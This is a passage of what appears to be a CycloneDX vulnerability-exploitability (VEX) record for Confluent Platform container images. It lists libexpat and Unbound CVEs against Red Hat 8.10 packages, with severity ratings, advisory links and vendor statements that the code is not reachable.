          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32776",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libexpat before 2.7.5 allows a NULL pointer dereference with empty external parameter entity content.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32776"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32776"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1158"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32776"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32776"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-07-14T13:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32777",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        835
      ],
      "description": "libexpat before 2.7.5 allows an infinite loop while parsing DTD content.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32777"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32777"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/1161"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1162"
        },
        {
          "url": "https://issues.oss-fuzz.com/issues/486993411"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32777"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32777"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-07-14T13:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32778",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libexpat before 2.7.5 allows a NULL pointer dereference in the function setContext on retry after an earlier ouf-of-memory condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32778"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32778"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1163"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32778"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32778"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-07-14T13:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32792",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125,
        166
      ],
      "description": "NLnet Labs Unbound 1.6.2 up to and including version 1.25.0 has a denial of service vulnerability when compiled with DNSCrypt support ('--enable-dnscrypt'). A bad DNSCrypt query could underflow Unbound's DNSCrypt packet reading procedure that may lead to heap overflow. A malicious actor can exploit the vulnerability with a single bad DNSCrypt query that its decrypted plaintext consists entirely of '0x00' bytes and does not contain the expected '0x80' marker. Unbound would then start reading more bytes than necessary until it finds a non-'0x00' byte. Based on the underlying memory allocator and the memory layout, it could lead to heap overflow while reading followed by a crash. Likelihood of a crash is low, since it relies heavily on the underlying memory allocator and the memory layout. If the heap overflow does not happen, Unbound's later packet checks will deny the packet. Unbound 1.25.1 contains a patch with a fix to bound reading in the given buffer space.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32792"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32792"
        },
        {
          "url": "https://nlnetlabs.nl/news/2026/May/20/unbound-1.25.1-released/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32792"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8282-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32792"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-32792.txt"
        }
      ],
      "published": "2026-05-20T10:16:26+00:00",
      "updated": "2026-07-24T10:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
